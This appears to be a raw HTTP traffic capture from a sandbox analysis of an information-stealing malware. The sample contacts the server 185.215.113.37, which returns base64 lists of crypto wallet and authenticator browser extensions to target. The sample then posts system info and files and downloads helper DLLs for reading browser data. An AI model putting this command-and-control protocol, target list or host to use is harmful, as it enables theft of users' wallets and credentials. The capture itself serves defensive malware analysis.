Sep 28, 2024 21:26:07.743117094 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:07 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 28, 2024 21:26:07.743129015 CEST	124	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1k
Sep 28, 2024 21:26:07.743161917 CEST	1236	IN	Data Raw: 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 Data Ascii: cG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2F
Sep 28, 2024 21:26:07.743248940 CEST	1236	IN	Data Raw: 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 Data Ascii: U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWN
Sep 28, 2024 21:26:07.743261099 CEST	448	IN	Data Raw: 63 47 56 76 61 32 4a 70 61 32 68 6d 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 46 79 64 47 6c 68 62 69 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d Data Ascii: cGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFR
Sep 28, 2024 21:26:07.743468046 CEST	1236	IN	Data Raw: 4d 58 77 77 66 44 42 38 52 55 39 54 49 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 62 32 56 73 61 6d 52 73 5a 48 42 75 62 57 52 69 59 32 68 76 62 6d 6c 6c 62 47 6c 6b 5a 32 39 69 5a 47 52 6d 5a 6d 5a 73 59 57 78 38 4d 58 77 77 66 44 Data Ascii: MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV0aGVudGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGprYmxiY29ibHwxfDB8MHxCaXR3YXJkZW58bm5nY2Vja2JhcGViZmltbmxuaWlpYWhrYW5kY2xibGJ8MXwwfDB8S2VlUGFzc1hDfG9
Sep 28, 2024 21:26:07.743478060 CEST	224	IN	Data Raw: 62 47 78 6c 64 48 78 6d 61 57 6c 72 62 32 31 74 5a 47 52 69 5a 57 4e 6a 59 57 39 70 59 32 39 6c 61 6d 39 75 61 57 46 74 62 57 35 68 62 47 74 6d 59 58 77 78 66 44 42 38 4d 48 78 46 59 33 52 76 49 46 64 68 62 47 78 6c 64 48 78 69 5a 32 70 76 5a 33 Data Ascii: bGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5n
Sep 28, 2024 21:26:07.743486881 CEST	1236	IN	Data Raw: 62 57 78 69 62 47 4e 76 5a 47 5a 76 59 6e 42 6b 63 47 56 6a 59 57 46 6b 5a 32 5a 69 59 32 64 6e 5a 6d 70 6d 62 6d 31 38 4d 58 77 77 66 44 42 38 52 6e 4a 76 62 6e 52 70 5a 58 49 67 56 32 46 73 62 47 56 30 66 47 74 77 63 47 5a 6b 61 57 6c 77 63 47 Data Ascii: bWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmt
Sep 28, 2024 21:26:07.743496895 CEST	368	IN	Data Raw: 61 57 35 38 4d 58 77 77 66 44 42 38 55 32 46 6d 5a 56 42 68 62 43 42 58 59 57 78 73 5a 58 52 38 59 58 42 6c 62 6d 74 6d 59 6d 4a 77 62 57 68 70 61 47 56 6f 62 57 6c 6f 62 6d 52 74 62 57 4e 6b 59 57 35 68 59 32 39 73 62 6d 68 38 4d 58 77 77 66 44 Data Ascii: aW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZ
Sep 28, 2024 21:26:07.744673014 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECF Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 2d 2d 0d 0a Data Ascii: ------AAAEBAFBGIDHCBFHIECFContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------AAAEBAFBGIDHCBFHIECFContent-Disposition: form-data; name="message"fplugins------AAAEBAFBGIDHCBFHIECF--
Sep 28, 2024 21:26:07.969059944 CEST	335	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:07 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 28, 2024 21:26:07.985903025 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDB Host: 185.215.113.37 Content-Length: 6531 Connection: Keep-Alive Cache-Control: no-cache
Sep 28, 2024 21:26:07.985949039 CEST	6531	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 Data Ascii: ------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 28, 2024 21:26:08.840781927 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 21:26:08.841460943 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 28, 2024 21:26:09.066611052 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:08 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 28, 2024 21:26:10.494112015 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJKEBGDHDAFHJKEGIID Host: 185.215.113.37 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Sep 28, 2024 21:26:11.276690960 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 21:26:11.354096889 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAECAFHDBGIDGCAEHJE Host: 185.215.113.37 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Sep 28, 2024 21:26:12.074107885 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:11 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 21:26:12.087140083 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKEGIDGDGHCAAAAKKFCG Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="file"------JKEGIDGDGHCAAAAKKFCG--
Sep 28, 2024 21:26:12.804004908 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:12 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 21:26:13.178144932 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEB Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="file"------CFBAKKJDBKJJJKFHDAEB--
Sep 28, 2024 21:26:13.907252073 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:13 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 28, 2024 21:26:14.105475903 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 28, 2024 21:26:14.327686071 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:14 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 28, 2024 21:26:15.221973896 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 28, 2024 21:26:15.448934078 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:15 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 28, 2024 21:26:15.858020067 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 28, 2024 21:26:16.215456963 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 19:26:15 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 